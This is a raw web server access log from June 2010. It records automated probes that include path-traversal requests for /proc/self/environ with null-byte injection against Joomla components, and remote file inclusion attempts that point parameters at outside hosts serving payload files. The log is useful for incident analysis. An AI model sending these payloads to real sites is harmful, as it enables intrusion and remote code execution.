178.63.49.142 - - [21/Jun/2010:02:13:41 -0400] "GET /logs/access_log.Q109063000 HTTP/1.1" 200 5874408 "http://www.aceonlinestore.com/logs/access_log.Q109063000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:13:41 -0400] "GET /logs/access_log.Q109062900 HTTP/1.1" 200 5053948 "http://www.aceonlinestore.com/logs/access_log.Q109062900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
203.211.129.97 - - [21/Jun/2010:02:14:49 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
178.63.49.142 - - [21/Jun/2010:02:14:41 -0400] "GET /logs/access_log.Q109070400 HTTP/1.1" 200 1764892 "http://www.aceonlinestore.com/logs/access_log.Q109070400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
114.108.128.56 - - [21/Jun/2010:02:15:23 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
95.215.0.123 - - [21/Jun/2010:02:15:24 -0400] "GET /logs/error_log.Q110020800%20%20//bbs//write_comment_update.php?board_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
95.215.0.123 - - [21/Jun/2010:02:15:24 -0400] "GET /logs/access_log.Q110020800%20%20//bbs//write_comment_update.php?board_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
94.136.63.119 - - [21/Jun/2010:02:15:26 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
94.136.63.119 - - [21/Jun/2010:02:15:26 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
178.63.49.142 - - [21/Jun/2010:02:14:41 -0400] "GET /logs/access_log.Q109070500 HTTP/1.1" 200 2033988 "http://www.aceonlinestore.com/logs/access_log.Q109070500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
95.215.0.123 - - [21/Jun/2010:02:15:59 -0400] "GET /logs/error_log.Q110020800//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 254 "-" "libwww-perl/5.834"
95.215.0.123 - - [21/Jun/2010:02:16:00 -0400] "GET //bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 228 "-" "libwww-perl/5.834"
95.215.0.123 - - [21/Jun/2010:02:16:00 -0400] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 233 "-" "libwww-perl/5.834"
94.228.131.90 - - [21/Jun/2010:02:16:28 -0400] "GET /?option=com_sectionex&controller=http://ulala2.fileave.com/Ckrid1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:02:16:28 -0400] "GET /logs/?option=com_sectionex&controller=http://ulala2.fileave.com/Ckrid1.txt? HTTP/1.1" 200 55286 "-" "Mozilla/5.0"
178.63.49.142 - - [21/Jun/2010:02:15:28 -0400] "GET /logs/access_log.Q109071100 HTTP/1.1" 200 2250018 "http://www.aceonlinestore.com/logs/access_log.Q109071100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:15:28 -0400] "GET /logs/access_log.Q109070900 HTTP/1.1" 200 4950912 "http://www.aceonlinestore.com/logs/access_log.Q109070900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:15:28 -0400] "GET /logs/access_log.Q109070700 HTTP/1.1" 200 4914184 "http://www.aceonlinestore.com/logs/access_log.Q109070700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:15:28 -0400] "GET /logs/access_log.Q109071500 HTTP/1.1" 200 4717248 "http://www.aceonlinestore.com/logs/access_log.Q109071500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:15:28 -0400] "GET /logs/access_log.Q109071300 HTTP/1.1" 200 4718643 "http://www.aceonlinestore.com/logs/access_log.Q109071300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:15:28 -0400] "GET /logs/access_log.Q109071000 HTTP/1.1" 200 3921078 "http://www.aceonlinestore.com/logs/access_log.Q109071000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:15:28 -0400] "GET /logs/access_log.Q109071400 HTTP/1.1" 200 5125803 "http://www.aceonlinestore.com/logs/access_log.Q109071400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:15:28 -0400] "GET /logs/access_log.Q109070800 HTTP/1.1" 200 4336924 "http://www.aceonlinestore.com/logs/access_log.Q109070800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:15:28 -0400] "GET /logs/access_log.Q109071600 HTTP/1.1" 200 5481659 "http://www.aceonlinestore.com/logs/access_log.Q109071600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:15:28 -0400] "GET /logs/access_log.Q109071200 HTTP/1.1" 200 2162244 "http://www.aceonlinestore.com/logs/access_log.Q109071200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
114.108.128.56 - - [21/Jun/2010:02:16:32 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:02:16:36 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:02:16:37 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:02:16:38 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
95.215.0.123 - - [21/Jun/2010:02:16:58 -0400] "GET /logs/access_log.Q110020800//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 255 "-" "libwww-perl/5.834"
178.63.49.142 - - [21/Jun/2010:02:16:29 -0400] "GET /logs/access_log.Q109072600 HTTP/1.1" 200 2133628 "http://www.aceonlinestore.com/logs/access_log.Q109072600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:16:29 -0400] "GET /logs/access_log.Q109072400 HTTP/1.1" 200 3768784 "http://www.aceonlinestore.com/logs/access_log.Q109072400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:16:29 -0400] "GET /logs/access_log.Q109072300 HTTP/1.1" 200 5083465 "http://www.aceonlinestore.com/logs/access_log.Q109072300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:16:29 -0400] "GET /logs/access_log.Q109072500 HTTP/1.1" 200 2074957 "http://www.aceonlinestore.com/logs/access_log.Q109072500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:16:29 -0400] "GET /logs/access_log.Q109072000 HTTP/1.1" 200 4437917 "http://www.aceonlinestore.com/logs/access_log.Q109072000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:16:29 -0400] "GET /logs/access_log.Q109072200 HTTP/1.1" 200 5101774 "http://www.aceonlinestore.com/logs/access_log.Q109072200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:16:29 -0400] "GET /logs/access_log.Q109071700 HTTP/1.1" 200 3577551 "http://www.aceonlinestore.com/logs/access_log.Q109071700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:16:29 -0400] "GET /logs/access_log.Q109072100 HTTP/1.1" 200 4525475 "http://www.aceonlinestore.com/logs/access_log.Q109072100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:16:29 -0400] "GET /logs/access_log.Q109071800 HTTP/1.1" 200 2661187 "http://www.aceonlinestore.com/logs/access_log.Q109071800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:16:32 -0400] "GET /logs/access_log.Q109071900 HTTP/1.1" 200 2331784 "http://www.aceonlinestore.com/logs/access_log.Q109071900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:17:31 -0400] "GET /logs/access_log.Q109072500 HTTP/1.1" 200 2074957 "http://www.aceonlinestore.com/logs/access_log.Q109072500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
114.108.128.56 - - [21/Jun/2010:02:17:58 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:02:18:20 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:02:18:21 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:02:18:22 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
82.76.12.197 - - [21/Jun/2010:02:18:23 -0400] "GET /logs/access_log.Q110060700/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:02:18:23 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:02:18:24 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:02:18:41 -0400] "GET /logs/access_log.Q110052800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
178.63.49.142 - - [21/Jun/2010:02:17:45 -0400] "GET /logs/access_log.Q109073100 HTTP/1.1" 200 3531011 "http://www.aceonlinestore.com/logs/access_log.Q109073100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:17:45 -0400] "GET /logs/access_log.Q109080100 HTTP/1.1" 200 1996380 "http://www.aceonlinestore.com/logs/access_log.Q109080100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:17:45 -0400] "GET /logs/access_log.Q109072700 HTTP/1.1" 200 4190321 "http://www.aceonlinestore.com/logs/access_log.Q109072700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:17:45 -0400] "GET /logs/access_log.Q109080500 HTTP/1.1" 200 3793390 "http://www.aceonlinestore.com/logs/access_log.Q109080500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:17:45 -0400] "GET /logs/access_log.Q109073000 HTTP/1.1" 200 4555164 "http://www.aceonlinestore.com/logs/access_log.Q109073000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:17:45 -0400] "GET /logs/access_log.Q109080200 HTTP/1.1" 200 2084930 "http://www.aceonlinestore.com/logs/access_log.Q109080200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:17:45 -0400] "GET /logs/access_log.Q109072900 HTTP/1.1" 200 4189147 "http://www.aceonlinestore.com/logs/access_log.Q109072900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:17:45 -0400] "GET /logs/access_log.Q109080400 HTTP/1.1" 200 4786327 "http://www.aceonlinestore.com/logs/access_log.Q109080400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:17:45 -0400] "GET /logs/access_log.Q109080300 HTTP/1.1" 200 4623136 "http://www.aceonlinestore.com/logs/access_log.Q109080300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:17:45 -0400] "GET /logs/access_log.Q109072800 HTTP/1.1" 200 4911230 "http://www.aceonlinestore.com/logs/access_log.Q109072800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:18:45 -0400] "GET /logs/access_log.Q109080100 HTTP/1.1" 200 1996380 "http://www.aceonlinestore.com/logs/access_log.Q109080100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:18:45 -0400] "GET /logs/access_log.Q109080200 HTTP/1.1" 200 2084930 "http://www.aceonlinestore.com/logs/access_log.Q109080200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
62.43.194.164 - - [21/Jun/2010:02:19:21 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:02:19:21 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:02:19:21 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.17.105.143 - - [21/Jun/2010:02:19:24 -0400] "GET /logs/error_log.Q110053100/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "libwww-perl/5.830"
62.43.194.164 - - [21/Jun/2010:02:19:27 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.124.198.61 - - [21/Jun/2010:02:19:49 -0400] "GET /logs/access_log.Q110011600//spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.124.198.61 - - [21/Jun/2010:02:19:49 -0400] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
74.124.198.61 - - [21/Jun/2010:02:19:49 -0400] "GET //spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:02:19:49 -0400] "GET /logs/access_log.Q110051800/?option=com_sectionex&controller=http://ulala2.fileave.com/Ckrid1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.8.98.179 - - [21/Jun/2010:02:19:52 -0400] "GET /logs/access_log.Q110011600//spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
64.8.98.179 - - [21/Jun/2010:02:19:52 -0400] "GET //spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
64.8.98.179 - - [21/Jun/2010:02:19:52 -0400] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:02:19:57 -0400] "GET /logs/access_log.Q110051400/?option=com_sectionex&controller=http://ulala2.fileave.com/Ckrid1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
114.108.128.56 - - [21/Jun/2010:02:20:00 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
178.63.49.142 - - [21/Jun/2010:02:19:10 -0400] "GET /logs/access_log.Q109080700 HTTP/1.1" 200 3796760 "http://www.aceonlinestore.com/logs/access_log.Q109080700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:19:10 -0400] "GET /logs/access_log.Q109081500 HTTP/1.1" 200 3060423 "http://www.aceonlinestore.com/logs/access_log.Q109081500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:19:10 -0400] "GET /logs/access_log.Q109080800 HTTP/1.1" 200 2589826 "http://www.aceonlinestore.com/logs/access_log.Q109080800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:19:10 -0400] "GET /logs/access_log.Q109081300 HTTP/1.1" 200 5011500 "http://www.aceonlinestore.com/logs/access_log.Q109081300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:19:10 -0400] "GET /logs/access_log.Q109081200 HTTP/1.1" 200 4716643 "http://www.aceonlinestore.com/logs/access_log.Q109081200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:19:10 -0400] "GET /logs/access_log.Q109080900 HTTP/1.1" 200 2146806 "http://www.aceonlinestore.com/logs/access_log.Q109080900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:19:10 -0400] "GET /logs/access_log.Q109080600 HTTP/1.1" 200 5127305 "http://www.aceonlinestore.com/logs/access_log.Q109080600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:19:10 -0400] "GET /logs/access_log.Q109081400 HTTP/1.1" 200 5006864 "http://www.aceonlinestore.com/logs/access_log.Q109081400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:19:10 -0400] "GET /logs/access_log.Q109081000 HTTP/1.1" 200 5307504 "http://www.aceonlinestore.com/logs/access_log.Q109081000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:19:10 -0400] "GET /logs/access_log.Q109081100 HTTP/1.1" 200 5268662 "http://www.aceonlinestore.com/logs/access_log.Q109081100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
209.59.12.99 - - [21/Jun/2010:02:20:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.237.56.50 - - [21/Jun/2010:02:20:41 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mservice.com.vn/htmls/images/myid.jpg? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
178.63.49.142 - - [21/Jun/2010:02:20:10 -0400] "GET /logs/access_log.Q109082400 HTTP/1.1" 200 5108182 "http://www.aceonlinestore.com/logs/access_log.Q109082400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:20:10 -0400] "GET /logs/access_log.Q109082300 HTTP/1.1" 200 2549877 "http://www.aceonlinestore.com/logs/access_log.Q109082300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:20:10 -0400] "GET /logs/access_log.Q109081900 HTTP/1.1" 200 4260094 "http://www.aceonlinestore.com/logs/access_log.Q109081900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:20:10 -0400] "GET /logs/access_log.Q109081600 HTTP/1.1" 200 3536999 "http://www.aceonlinestore.com/logs/access_log.Q109081600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:20:10 -0400] "GET /logs/access_log.Q109082500 HTTP/1.1" 200 6226032 "http://www.aceonlinestore.com/logs/access_log.Q109082500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:20:10 -0400] "GET /logs/access_log.Q109082200 HTTP/1.1" 200 2103181 "http://www.aceonlinestore.com/logs/access_log.Q109082200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:20:10 -0400] "GET /logs/access_log.Q109082100 HTTP/1.1" 200 4228229 "http://www.aceonlinestore.com/logs/access_log.Q109082100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:20:10 -0400] "GET /logs/access_log.Q109081800 HTTP/1.1" 200 5710162 "http://www.aceonlinestore.com/logs/access_log.Q109081800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:20:10 -0400] "GET /logs/access_log.Q109082000 HTTP/1.1" 200 6174306 "http://www.aceonlinestore.com/logs/access_log.Q109082000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:20:10 -0400] "GET /logs/access_log.Q109081700 HTTP/1.1" 200 5323695 "http://www.aceonlinestore.com/logs/access_log.Q109081700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
188.72.70.56 - - [21/Jun/2010:02:21:20 -0400] "GET /logs/access_log.Q110061300//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:21:20 -0400] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:21:21 -0400] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.834"
125.249.199.195 - - [21/Jun/2010:02:21:26 -0400] "GET /logs/access_log.Q110042400%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:02:21:26 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:02:21:26 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:02:21:29 -0400] "GET /logs/error_log.Q110060500%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.211.129.97 - - [21/Jun/2010:02:21:30 -0400] "GET /logs/error_log.Q110053000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
203.211.129.97 - - [21/Jun/2010:02:21:30 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
203.211.129.97 - - [21/Jun/2010:02:21:31 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
216.17.105.143 - - [21/Jun/2010:02:21:46 -0400] "GET /logs/access_log.Q110061100/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
178.63.49.142 - - [21/Jun/2010:02:21:10 -0400] "GET /logs/access_log.Q109090400 HTTP/1.1" 200 3702764 "http://www.aceonlinestore.com/logs/access_log.Q109090400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:21:10 -0400] "GET /logs/access_log.Q109090300 HTTP/1.1" 200 5190518 "http://www.aceonlinestore.com/logs/access_log.Q109090300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
